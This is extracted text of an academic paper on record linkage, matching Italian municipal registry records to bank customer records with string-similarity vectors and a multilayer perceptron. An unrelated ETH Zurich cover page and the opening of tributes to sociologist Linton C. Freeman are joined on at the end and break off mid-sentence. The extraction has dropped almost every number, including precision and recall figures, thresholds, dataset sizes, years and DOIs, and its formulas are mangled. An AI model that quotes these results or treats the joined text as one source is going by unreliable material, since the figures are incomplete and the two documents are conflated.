established phases of a rl process will be outlined, then the recent literature on neural networks applied to rl will be summarized. phases of rl the rl of two sources generally involves five independent phases, each exploiting different techniques, criteria, and algorithms christen ( ): . data pre-processing : the two sources are cleaned and normalized to ensure that all the data have the same format and are as much as possible error free; . indexing : to save time, the record pairs that are evidently different are filtered out from the comparisons through clustering, sorting or blocking. record linkage is exponential in nature, as each record from the first source should be compared with all the records from the other sources, hence indexing is critical for performance; . comparison: only the record pairs within the same block (or cluster) are actually compared one by one, using multiple similarity criteria that are conveyed into a similarity vector; maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . classification: the similarity vector obtained from each pair of records within the same block (or cluster) is classified into one of three groups: • (m) –matches, that is pairs that do refer to the same entity of the real world; • (nm) –non-matches, that is pairs that do not refer to the same entity of the real world; • (pm) –potential-matches or ambiguous pairs, that is pairs that can’t be classified with sufficient precision or reliability; . evaluation: the classified pairs are reviewed for final labeling. specifically, the pm class is subject to a clerical review, where domain experts decide for each ambiguous pair if it is actually a match or not. related work being a possible consequence of both a poor data quality process than natural differences in the data evolving over time, rl has been found in countless domains and tackled using many techniques and approaches. the related literature can be broadly split into census, administrative or health related applications, with a majority of works exploiting probabilistic methods. artificial neural networks (ann from now on) as classifiers are less in number and relatively recent. some of the main issues of administrative data linkage are privacy and confidentiality requirements and to the absence of common identifiers (much like health data. please refer to harron et al. ( ) for a discussion and to vatsalan, christen & verykios ( ) for a taxonomy). if from one side epidemiological studies linking census or administrative data to diseases are pretty common, from the other side the specific case of linking census with financial data at the individual level is rare, if not absent, in the rl literature. the reason is that medical data are mostly held by public agencies that have a public interest in sharing their data and supporting medical research, while banks are private companies that keep their data safe and secure on their servers, having little interest in sharing their analysis. recent literature on machine learning applied to rl includes aiken et al. ( ), that compares probabilistic, stochastic and machine learning approaches, showing that supervised methods outperform unsupervised ones; dong & rekatsinas ( ), that surveys state-of-the-art data integration solutions based on machine learning with a discussion of open research challenges; kasai et al. ( ), that leverages deep learning in a combination of transfer and active learning aiming to save labeled data up to an order of magnitude; di cicco et al. ( ), that presents an attempt of explainable deep learning exploiting lime, a popular tool for prediction explanations in classification; hou et al. ( ), that propose a paradigm called ‘‘gradual machine learning’’ where data are labeled automatically through iterative factor graph inference, starting with the easiest instances and going up to the hardest ones. a survey of the state of the art is beyond the scope of this paper, so this section will focus on ann classifiers applied to classification in rl, in line with the recent explosion of ann related literature (please see maratea & ferone, ). maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. one of the first attempts is apparently due to zhao & ram ( ), that proposed a set of ensemble learning methods combining multiple base classifiers, including a backpropagation ann. records are compared through various similarity measures and classifiers are merged through bagging, boosting, stacking, cascading or cross-validated committees. using , records ( , non-matching examples and , matching examples) from an application service provider (asp) for the airline industry, the authors tried to identify the same customer that reserved different flights with different airline companies, reaching over % of accuracy. authors warn the reader on the limited generalization of the experiments due to the ‘‘somewhat balanced’’ data used. more recently, wilson ( ) showed on the base of genealogical databases that the results obtainable from the probabilistic rl are easily improvable through one of the various available machine learning or ann techniques, and that even a simple single layer perceptron network tends to outclassify the probabilistic approaches, reaching % of precision and . % of recall compared to . % precision and % recall of the probabilistic methods. a singular case is the work siegert et al. ( ) in the linkage of epidemiological cancer registries data previously pseudo-randomized through hashing and encrypted for privacy reasons. features are extracted from the obscured data and used as they were a new coding of the records, then the classification is performed on these coded data. similarly to zhao & ram ( ), multiple classifiers and ensembles are tested, with many aggregation functions. approximately , match pairs and , of not matches for a total of , pairs of records were manually classified from the north rhine-westphalia cancer registry in germany and used as training-set for the supervised learning classifiers. the proposed ann is structured with a single hidden layer of neurons and a sigmoidal activation function. among the three classifiers used, the one based on ann provided better results in both precision and recall terms, reaching a . % precision and . % recall. even in this case, data are artificially balanced. subitha & punitha ( ) propose the use of elman’s neural networks to pair the medical records collected by hand from different hospitals and departments, achieving an accuracy of % and a recall of % with respect to fuzzy decision trees ( % and %) and decision trees ( % and %). the comparing phase was performed using only the normalized levenshtein distance as the similarity criteria. the elman neural network (enn) is a particular type of neural network in which a layer of neurons called ‘‘context units’’ connected with a fixed weight of . both to the input and to the output of the hidden layer is added. in the context units, a copy of the last output of the hidden layer is saved to be used for subsequent inputs. in this way the network can maintain a sort of state, allowing tasks such as the prediction of sequences that go beyond the power of a standard multilayer perceptron. mudgal et al. ( ) present a general framework for the application of deep neural networks (dnn from now on) to rl, stressing connections with natural language processing: three type of problems are highlighted: structured, textual and dirty rl. their goal is to illustrate the benefits and limitations of dl when applied to rl. an empirical maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure block diagram of the proposed method. full-size doi: . /peerjcs. /fig- evaluation based on models and datasets is presented to show when dnn outperform traditional approaches, obtaining a relevant improvement in case of unstructured data. kooli, allesiardo & pigneul ( ) report a dnn application for rl using relevant word extraction and word embedding instead of the classic calculation of the similarity vector from record pairs. three architectures are compared: multi-layer perceptron (mlp), long short term memory networks (lstm) and convolutional neural networks (cnn) on poorly structured scientific publications databases by getting very good results and showing improvements compared to classical similarity-based approaches. the authors point out that their approach is fully automatic unlike a previous job of gottapu, dagli & ali ( ) that also uses dnn but in a human/machine hybrid fashion, by facilitating the manual categorization in a crowd-sourcing methodology, by proposing to the operator a list of possible matches. ebraheem et al. ( ) used unidirectional and bidirectional recurrent neural networks (rnns) with long short term memory (lstm) hidden units to convert each tuple to a distributed representation, which was the base for subsequent classification. experiments on datasets from different domains showed promising results. materials and methods a block representation of the proposed method is depicted in fig. : it involves the comparing and classifying phases of rl (see ‘phases of rl’): it takes as input pairs of records and classifies them into ‘‘match’’ (m) or ‘‘non-match’’ (nm) through an ann. the features of each candidate record pair are extracted by comparing each corresponding attribute with multiple similarity functions, resulting in a similarity vector (see below for more details). it is this similarity vector that is used for the subsequent classification of the candidate pair. in order to have comparable tests, all preceding phases use the same methods and parameters. data sources real data from separate municipal and banking databases have been gathered, chosen in the same geographical area to increase the probability of match (see table ). for both municipal and banking databases, each person is identified through the fiscal code (alias social security number, alias insurance number). being a natural key and a reliable field, this common identifier was leveraged to create, through joins, a gold standard for training and evaluation purposes: if in a pair, both records had the same value for the fiscal code, they are considered a true-match. the fiscal code is derivable from first name, last name, date and place of birth plus some special codes. surprisingly, clerical reviews showed that in rare cases even the fiscal code maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table used databases flanked by their size. database name type alias # record anag_uno municipal registry a , anag_due municipal registry b , anag_tre municipal registry c , anag_quattro municipal registry d , bcc_uno bank details x , , bcc_due bank details y , bcc_tre bank details z , table attributes in common between banking and municipal databases. attribute municipal column bank column surname cognome intestazione_a name nome intestazione_b sex sesso sesso birth state stato_nascita nazionalita birth date dat_nascita data_nascita birth place com_nas descr_com_nasc birth province prov_com_nas provincia_nasc via_dom address numero_civico_dom via_res zip code cap_dom cap_res province prov_com_dom prov_res telephone telefono numero_telefono presents some errors, i.e., does not correspond to the value derivable from the other fields of the record. this can lead to rare cases in which a pair of records is correctly classified as a match by the classifier but results indeed a false positive for the evaluation metric. for this reason, all the figures of merit presented hereafter have to be considered conservatively estimated. relevant attributes as a first step, it is necessary to select a subset of relevant and shared attributes between the municipal and banking databases to be used in the rl process. the selected attributes are shown in table . special attention should be paid to attributes address, zip code and province because they have a different meaning, representing the home address in municipalities databases and the residence address in banking databases. these values are often the same but do not always coincide. each attribute is cleaned, standardized and normalized through multiple transforma- tions, turning everything lower case, removing special symbols, punctuation, repeated spaces, non-alphabetic characters and finally normalizing accented letters. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. indexing indexing is performed with multiple blocking indexing, combining the results obtained from blocking keys. . blocking key : <surname, name, b.date>, using the double metaphone phonetic algorithm for the key comparison; . blocking key :<b.date, b.place, b.province>, using the double soundex phonetic algorithm for the key comparison; . blocking key : <surname, name, sex, b.date, b.place, b.province> using for the key comparison: the last character suffix for name and surname; the first character prefix for the birth place and province; and the year and month for the birth date. these blocking criteria were determined through experimental test and chosen to maximize the pair completeness as much as possible by keeping the number of candidate record pairs generated low, to reduce the execution time in view of the numerous tests to be performed. comparing in the comparison phase, the similarity of each pair of records (a,b) is measured using a set s of string-based similarity functions on the corresponding attributes (name of the first record with name of the second record, surname of the first record with surname of the second record and so on). each comparison function has a normalized output in the interval [ , ]. where indicates maximum dissimilarity and indicates maximum similarity (please see navarro, ; christen, ). the set s of comparison functions used is listed below: (a) jaro–winkler, (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. each one of the corresponding attributes pairs (ai,bi) is compared using all the function in the set and the resulting values are then chained in a similarity vector s. s=sims(a ,b )⊕sims(a ,b )⊕sims(a ,b )⊕ ... figure shows an example of this procedure. at the end, each pair of records will be associated with a similarity vector to be used for classification. classifying the ann used for the classification is shown in the fig. , it’s a fully connected multilayer perceptron network (mlp from now on), with two hidden layers in a pyramidal structure, a relu activation function: relu(x)=x+=max( ,x) and a softmax cross entropy loss function: l(y,ŷ)= ∑ i h(yi,ŷi)= ∑ i yi ·logŷi. the optimal number of neurons and the size of the layers have been determined through iterative optimization on experimental tests. the final architecture is: maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of the similarity vector obtained comparing two records using four similarity func- tions (please see table for attribute mapping). full-size doi: . /peerjcs. /fig- • input layer: a layer of as many neurons as the components of the similarity vectors to be classified; • hidden layer: two layers to form a pyramidal structure, the first with and the second with neurons; • output layer: a layer of two neurons, one for the class of the matches (m) and the other for the non-matches (nm). for the initialization the glorot_uniform_initializer (aka xavier uniform initializer) was used. with this random initalization of the mlp parameters no relevant changes in the performance were noted over different runs. the network was trained using the adam optimizer by applying a l regularization to avoid overfitting. training data-set generation the training data-set, in the format (feature,label) is generated based on the candidate record pairs identified in the indexing phase between databases a and b, where: • feature: is the similarity vector obtained comparing the records of the pair; • label: is true-match (m) or true-not match (nm), according to the gold standard. the built training data-set contains , samples, , of which are labeled as true-match (m) and as true-non-match (nm). since non-matching record pairs are more than matching ones, the training data are moderately imbalanced (they are in the same order of magnitude). over-sampling techniques like adasyn (he et al., ) and based on smote, such as smotenc (bowyer et al., ) smotenn (batista, prati & monard, ), smotetomek (batista, maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure used fully connected mlp architetture for the classifyng phase. where the input layer as many neurons as the components of the similarity vectors to be classified. there are two hidden layers one of size and the other of and the output layer is composed of two units, one for the class of the matches (m) and the other for the non-matches (nm). the activation function used is the relu and the loss function is the softmax cross entropy. the weights are initalized with xavier uniform initializer and the training was performed using the adam optimizer by applying a l regularization. full-size doi: . /peerjcs. /fig- bazzan & monard, ) have been tested, without any significant improvement, so oversampling was skipped from final experiments. experiments for each test the same set of attributes, pre-processing and indexing techniques have been used in order to focus on the comparing and classifying phases. figure shows the starting condition for the tests in order to have a reference on the number of true-match and of pairs identified by the indexing between the various coupled databases. since there are seven different databases available, grouped in municipalities (four) and banks (three), executions will be performed for each test, pairing databases between groups and excluding deduplication (that is the match of a database against itself). only the pair (a, b) is used as training-set. the chosen figure of merits are precision and recall, preferred to plain accuracy due to the moderate imbalance, as explained by christen & goiser ( ). their average and standard deviation over the runs are reported in the following. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure tests starting conditions after the indexing phase, for all the possible pairs of databases. (a) number of candidate record pairs to be classified, obtained from the indexing phase. (b) number of true- match record pair in the gold standard. (c) pair completeness, i.e., percentage of true match retrieved in the indexing phase with respect to the gold standard. full-size doi: . /peerjcs. /fig- figure exact matching results. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- exact matching in the very first test, rl has been performed with an exact match goal, where the candidate record pairs are classified as match only if all the respective fields are perfectly equal. this test has been carried out only to show how much two databases, while containing the same information, actually differ in the values of their attributes. as expected (fig. ), the precision is extremely high, but the number of matches is extremely low, as shown by the recall. in fact, in some cases no pair have been identified, with a maximum of only matches, by consequence of errors, noise, and random variations in the corresponding data. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results for levenshtein normalized distance with threshold θ = . . (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- threshold based classification in the next test an optimal binary threshold classifier was used. the threshold value was determined through a pr graph (precision–recall) generated on the training data-set. as threshold, the value having coordinates closest to the ideal point ( . , . ) was chosen (see figs. a –a ). levenshtein threshold in this test, the only similarity criterion was the levenshtein normalized distance (levenshtein, )—one of the most widely used comparison metrics. • comparing : levenshtein normalized distance. • classifying : binary threshold with θ = . as optimal value, applied to the weighted sum of the similarity vector. • weighting : each attribute has the same importance and weight. figure shows the results obtained on the executions. the average precision is , % and the average recall is , %, although with high variability. multiple criteria threshold in this test, multiple comparison criteria for each attribute were used, with the underlying idea that different criteria measure different facets of the similarity between them. recall actually improved. • comparing : each attribute is compared using the following metrics: (a) jaro–winkler, (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. • classifying : binary threshold with θ = . as optimal value applied to the weighted sum of the similarity vector. • weighting : each attribute has the same importance and weight. figure shows the results of the executions: the average precision is , % and the average recall is , %, although with high variability. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results for multiple criteria similarity with threshold θ = . , unweighted. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- weighted multiple criteria threshold in this test, the previous results were improved by varying the importance of the various fields through an appropriate weighing. the weights, for each attribute, were automatically determined based on their distinct values distribution, and normalized in such a way that their sum is equal to . (see fig. a ). among the various possibilities of normalization (linear, max, quadratic, exp ...) that logarithmic seems to give the best results for both overall precision and recall maintaining low variance (see fig. a ). • comparing : each attribute is compared using the following metrics: (a) jaro–winkler, (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. • classifying : binary threshold with θ = . as optimal value applied to the weighted sum of the similarity vector. • weighting : the weights of the various attributes are estimated according to the distribution of their distinct values and normalized using a logarithmic function. the associated weight is directly proportional to the number of distinct values over the totals. figure shows the results of the executions: the average precision is , % and the average recall is , %, with low variability. mlp based classification to allow a fair comparison, the tests using mlp classifier have followed the same schema of the the previous ones. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results for multiple criteria similarity with threshold θ = . , weighted. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- figure results of the levenshtein test with mlp classifier. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- mlp levenshtein in this test, only the normalized levenshtein distance was used, likewise the homonym test with the threshold classifier. as can be seen, the results clearly outperform all previous ones. • comparing : levenshtein normalized distance only. • classifying : mlp based classifier. figure shows the results of the executions: the average precision is , % and the average recall is , %, with very low variability. mlp with multiple criteria in this test, multiple comparison criteria for each attributes have been used, likewise the homonym test with the threshold classifier. the results are almost perfect, especially for recall. in addition, the high precision allowed the manual control of the ‘‘false-positive’’ pairs, many of which are actually correct, but due to errors have a different fiscal code in the gold standard (see data sources). considering these fixes, precision reaches % in some cases. • comparing : each attribute is compared using the following comparators: (a) jaro–winkler, maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results of test # for mlp classification. (a) precision; (b) recall. full-size doi: . /peerjcs. /fig- table experimental results summary: summarized results obtained through the mean values and standard deviation of the executions for each test. classifier comparators %precision %recall threshold levenshtein , %± , % , %± , % threshold all , %± , % , %± , % weighted threshold all , %± , % , %± , % multilayer perceptron levenshtein , %± , % , %± , % multilayer perceptron all , %± , % , %± , % (b) levenshtein, (c) cosine, (d) jaccard, (e) siresen-dice, (f) bigrams, (g) trigrams, (h) exact. • classifying : mlp based classifier. figure shows the results of the executions: the average precision is , % and the average recall is , %, with very low variability. summary results in table , a comprehensive view of the obtained results through the mean values and standard deviation of the executions is reported. conclusions first the various stages of the classic record linkage (rl) process have been presented, then a classifier based on multiple criteria and neural networks has been proposed in the classification stage of rl. specifically, the chaining of different similarity measures on different fields has been used as feature vector for the subsequent classification of record pairs based on multi-layer perceptron (mlp). the proposed feature vector plus mlp classifier has been tested on several real-world datasets belonging to geographically close maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure a levenshtein threshold. (a) the precision–recall curve generated on the training-set in experi- ment # ; the optimal threshold is tr = . . (b) the f -score when the threshold changes. full-size doi: . /peerjcs. /fig- banks and municipalities, scoring remarkably (please see table ) and clearly outperforming the threshold-based methods. neural networks, even with a shallow architecture and few nodes, proved to be effective classifiers and should be seriously considered for rl when even a modest amount of labeled data is available. acknowledgements the authors thank sadas s.r.l. (https://www.sadasdb.com/en/) for providing the necessary data and making their columnar database, proprietary technologies and research laboratories available. appendix precision recall curve in this section are shown in figs. a –a , for each threshold-based test, the precision–recall curve generated on the training-set database pair (a, b). these curves were used to determine the optimal threshold value for classifiers. weight vector estimation in this section, the methodology used in experiment for the weights estimation is described. the weight vector has as many components as there are attributes selected for the rl each of which is calculated as: wi= log‖suppai‖ log‖ai‖ · log‖suppbi‖ log‖bi‖ ( ) where ai and bi are the multi-set values of the corresponding i-th attribute of the first and second table respectively. the notation supp· indicate the support, i.e., the set of unique items in multi-set and ‖·‖ denotes the cardinality. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.sadasdb.com/en/ http://dx.doi.org/ . /peerj-cs. figure a multiple criteria threshold. (a) the precision–recall curve generated on the training-set in experiment # ; the optimal threshold is tr = . . (b) the f -score when the threshold changes. full-size doi: . /peerjcs. /fig- figure a weighted multiple criteria threshold. (a) the precision–recall curve generated on the training-set in experiment # ; the optimal threshold is tr = . . (b) the f -score when the threshold changes. full-size doi: . /peerjcs. /fig- this measure takes into account both the number of distinct values and the size difference of the two tables. weight vector normalization in this section are shown, the vector normalization technique and then, for each normalization base function, in fig. a , the precision–recall curve generated on the training-set database pair (a,b). these curves were used to select the best type of normalization. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure a (a) the precision–recall curves generated on the training-set in experiment # for each of the normalization techniques; (b) a zoomed view of the same curves. the relative winner, in terms of precision and recall, was the quadratic normalization, but results of higher quality and lower variance were obtained using a logarithmic function. full-size doi: . /peerjcs. /fig- normalization to alter the contribution of the various attributes during the classification while maintaining unchanged the weighted sum of the components of the similarity vector, a normalization of the weight vector is necessary. given a weight vector w=(w ,w ,...,wn) and same base function f a normalized vector ŵ=(ŵ ,ŵ ,...,ŵn) can be obtained simply by applying element-wise the equation: ŵi= f (wi)∑n j= f (wj) ( ) i.e., applying the function f to each element of the input vector wi and normalizing these values by dividing by the sum of all these values; this normalization ensures that the sum of the components of the output vector ŵ is . the tested base function f are listed below: linear: f (x)=x quadratic: f (x)=x cubic: f (x)=x logaritmic: f (x)= log( +x) softmax: f (x)=ex inverse: f (x)=x− precision–recall curves results for both overall precision and recall among the various possibilities of normalization: linear, max, quadratic, exp ... logarithmic. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • antonio maratea conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • angelo ciaramella analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • giuseppe pio cianci performed the experiments, authored or reviewed drafts of the paper, performed the computation work, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: the data, code, and a readme file are available in the supplementary files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aiken vcf, dórea jrr, acedo js, de sousa fg, dias fg, de magalhães rosa gj. . record linkage for farm-level data analytics: comparison of deterministic, stochastic and machine learning methods. computers and electronics in agriculture : doi . /j.compag. . . batini c, scannapieco m. . data quality: concepts, methodologies and techniques. berlin: springer. batista geapa, bazzan alc, monard mc. . balancing training data for automated annotation of keywords: a case study. batista geapa, prati rc, monard mc. . a study of the behavior of several methods for balancing machine learning training data. acm sigkdd explorations newsletter ( ): – doi . / . . bowyer kw, chawla nv, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . brizan dg, tansel au. . a. survey of entity resolution and record linkage method- ologies. communications of the iima ( ): . maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.compag. . http://dx.doi.org/ . / . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /peerj-cs. christen p. . a survey of indexing techniques for scalable record linkage and dedu- plication. ieee transactions on knowledge and data engineering ( ): – . christen p. . data matching: concepts and techniques for record linkage, entity resolution, and duplicate detection. berlin, heidelberg: springer-verlag. christen p, goiser k. . quality and complexity measures for data linkage and dedu- plication. in: quality measures in data mining. studies in computational intelligence, berlin, heidelberg: springer-verlag, – . di cicco v, firmani d, koudas n, merialdo p, srivastava d. . interpreting deep learning models for entity resolution: an experience report using lime. in: proceedings of the second international workshop on exploiting artificial intel- ligence techniques for data management, aidm ’ . new york: acm, : – : doi . / . . dong xl, rekatsinas t. . data integration and machine learning: a natural synergy. in: proceedings of the international conference on management of data. new york: acm, – . ebraheem m, thirumuruganathan s, joty sr, ouzzani m, tang n. . distributed representations of tuples for entity resolution. pvldb : – . gottapu rd, dagli c, ali b. . entity resolution using convolutional neural network. procedia computer science : – doi . /j.procs. . . . harron k, dibben c, boyd j, hjern a, azimaee m, barreto ml, goldstein h. . challenges in administrative data linkage for research. big data & society ( ): . he h, bai y, garcia ea, li s. . adasyn: adaptive synthetic sampling approach for imbalanced learning. in: ieee international joint conference on neural networks (ieee world congress on computational intelligence), ijcnn . – . hou b, chen q, shen j, liu x, zhong p, wang y, chen z, li z. . gradual machine learning for entity resolution. in: the world wide web conference, www ’ . new york: acm, – doi . / . . kasai j, qian k, gurajada s, li y, popa l. . low-resource deep entity resolution with transfer and active learning. corr abs/ . . kooli n, allesiardo r, pigneul e. . deep learning based approach for entity resolution in databases. in: intelligent information and database systems. cham: springer international publishing, – . levenshtein vi. . binary codes capable of correcting deletions, insertions and reversals. soviet physics doklady ( ): – . doklady akademii nauk sssr, v no - . maratea a, ferone a. . deep neural networks and explainable machine learn- ing. in: fuzzy logic and applications— th international workshop, wilf , genoa, italy, september – , , revised selected papers. – doi . / - - - - _ . mudgal s, li h, rekatsinas t, doan a, park y, krishnan g, deep r, arcaute e, raghavendra v. . deep learning for entity matching: a design space exploration. maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. in: proceedings of the international conference on management of data, sigmod ’ . new york: acm, – doi . / . . navarro g. . a guided tour to approximate string matching. acm computing surveys ( ): – doi . / . . siegert y, jiang x, krieg v, bartholomäus s. . classification-based record linkage with pseudonymized data for epidemiological cancer registries. ieee transactions on multimedia ( ): – doi . /tmm. . . subitha s, punitha sc. . an effective method for matching patient records from multiple databases using neural network. international journal of computer appli- cations ( ): – . vatsalan d, christen p, verykios vs. . a taxonomy of privacy-preserving record linkage techniques. information systems ( ): – doi . /j.is. . . . wilson dr. . beyond probabilistic record linkage: using neural networks and complex features to improve genealogical record linkage. in: the international joint conference on neural networks. – doi . /ijcnn. . . zhang lq. . record linkage methodology and applications. in: handbook of data intensive computing. new york: springer new york, – . zhao h, ram s. . entity identification for heterogeneous database integration—a multiple classifier system approach and empirical evaluation. information systems ( ): – doi . /j.is. . . . maratea et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /j.is. . . http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /j.is. . . http://dx.doi.org/ . /peerj-cs. research collection other journal item a collection of tributes to linton c. freeman author(s): bernard, russ; bienenstock, elisa; borgatti, steve; brandes, ulrik; burt, ron; butts, carter; doreian, pat; fararo, tom; faust, katie; johnson, jeff; kanfer, alaina m.; krackhardt, david; skvoretz, john; wellman, barry publication date: - permanent link: https://doi.org/ . /ethz-b- originally published in: connections (insna) ( ), http://doi.org/ . /connections- - rights / license: creative commons attribution . international this page was generated automatically upon download from the eth zurich research collection. for more information please consult the terms of use. eth library https://doi.org/ . /ethz-b- http://doi.org/ . /connections- - http://creativecommons.org/licenses/by/ . / https://www.research-collection.ethz.ch https://www.research-collection.ethz.ch/terms-of-use © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections (insna) issue | vol. article | doi: . /connections- - a collection of tributes to linton c. freeman russ bernard, elisa bienenstock, steve borgatti, ulrik brandes, ron burt, carter butts, pat doreian, tom fararo, katie faust, jeff johnson, alaina michaelson kanfer, david krackhardt, john skvoretz and barry wellman a collection of tributes to linton c. freeman this collection of tributes to linton c. freeman is meant to remind us that the field of social network analysis is marked by shared connections, intellectual and social, and the role that lin and sue, his wife and partner, played in creating them. lin’s friends, students and colleagues tell us their stories of lin and through them we learn about lin the man, the professor, the scientist, the dean, the mentor, the editor, the teacher, the friend, and the networker. the contributors to this collection of tributes are russ bernard, elisa bienenstock, steve borgatti, ulrik brandes, ron burt, carter butts, pat doreian, tom fararo, katie faust, jeff johnson, alaina mi- chaelson kanfer, david krackhardt, john skvoretz, and barry wellman. in memoriam: linton c. freeman katie faust and carter butts linton “lin” freeman, so- ciology research professor at the university of califor- nia, irvine, passed away on august , . he was . freeman served as dean of the uci school of so- cial sciences from to . he retired from uci in and continued on as a research professor in sociology, teaching courses in social network analy- sis. prior to his uci service, freeman held professor- ships at syracuse university ( - ), university of pittsburgh ( - ), university of hawaii ( - ), and lehigh university ( - ) where he was the lucy g. moses distinguished professor of sociology. freeman was a mathematical sociologist whose research focused on social network analysis. he used formal models and network analyses of empirical data to answer questions about how and why groups form. he was author or coauthor of books and more than scholarly articles that appeared in a diverse array of journals including the american anthropologist, an- imal behavior, social cognition, social networks, and social forces, to name a few. lin was born in chicago in and grew up near the university of chicago. he was named after the an- thropologist ralph linton, one of his father’s closest friends. as lin told the story, ralph was doing field work in madagascar at the time of lin’s birth, and his father “somehow managed to embrace a very quaint victorian notion that it was perfectly all right to take a person’s last name without asking, but you could not take their first name.” so, instead of ralph freeman, we had lin freeman. lin was a towering figure in social network analy- sis, one of the pioneers of the field, and a major con- tributor to a wide range of topics in the discipline. it is difficult to find an area of social network analysis that has not been influenced by his work. lin received his bachelor’s in psychology and soci- ology from roosevelt university, his master’s in soci- ology and anthropology from the university of hawaii, and his doctorate in sociology from northwestern university. his early career is marked by major con- tributions to the study of community decision making and leadership, research done at syracuse university in collaboration with morry sunshine, sue freeman, tom fararo, and warner bloomberg. late in his long career, lin outlined his own view of the history of the field in an influential book, the development of social network analysis: a study in the sociology of science ( ). written in response a collection of tributes to linton c. freeman to the then-fashionable notion that the study of so- cial networks was a “new science,” he mapped out the development of social network analysis starting in the s, noting the many threads that came together to form the field as we know it today. he also described his own early structural research and his epiphany about the common network per- spective that unified otherwise seemingly disparate lines of work. in a recent interview, he described the “mental flip” that he had immediately upon reading anatol rapoport’s paper, “a study of a large sociogram.” in lin’s words: “[…] mathematical biol- ogy [being done by rapoport] at chicago was really sociology […]. he gave us a mathematical founda- tion for thinking about social linkages in structural terms.” lin’s research on social networks brought that insight to full realization. his contributions on centrality are lin’s first pub- lications to explicitly embrace all aspects of a social network perspective, and have had a profound and lasting influence on the field. his article “centrality in social networks: i. conceptual clarification” mapped out key distinctions between different approaches for quantifying central- ity and centralization, and established a quorum of formally defined metrics for these concepts that are still the gold standard in the field. likewise, his work on human social intelligence and perception of social groups contributed both to the systematic collection of network data and to our understanding of how people see social relations and social groups, feeding fruitful lines of research that continue to this day. he made sustained contributions to network visualiza- tion, formalizing the sociological concept of “group,” measurement of dominance hierarchies, and the de- velopment of the field of social networks as a scientif- ic institution. he was one of the early authors of the widely used network analysis software ucinet and published widely on the use of computers in social science in an era when this was a largely untapped frontier. throughout his career, he helped define re- search directions that would become central con- cerns within the field. beyond his research contributions, lin was also a pivotal player in the institutionalization of the field. he founded the flagship journal social networks and edited it from to . this journal was one of the important institutional advances of mid- s that helped to consolidate the interdisciplinary field of social networks. the journal continues to be the central outlet for social network research and pro- vides a focal point for contributions from a wide range of disciplines. a careful student of publication practices across disciplines, lin consciously mod- eled his editorial approach at social networks after successful examples in the broader scientific com- munity. his contributions to building social networks as a scientific discipline were also supported by the national science foundation-funded electron- ic information exchange system (eies) experiment, work done in collaboration 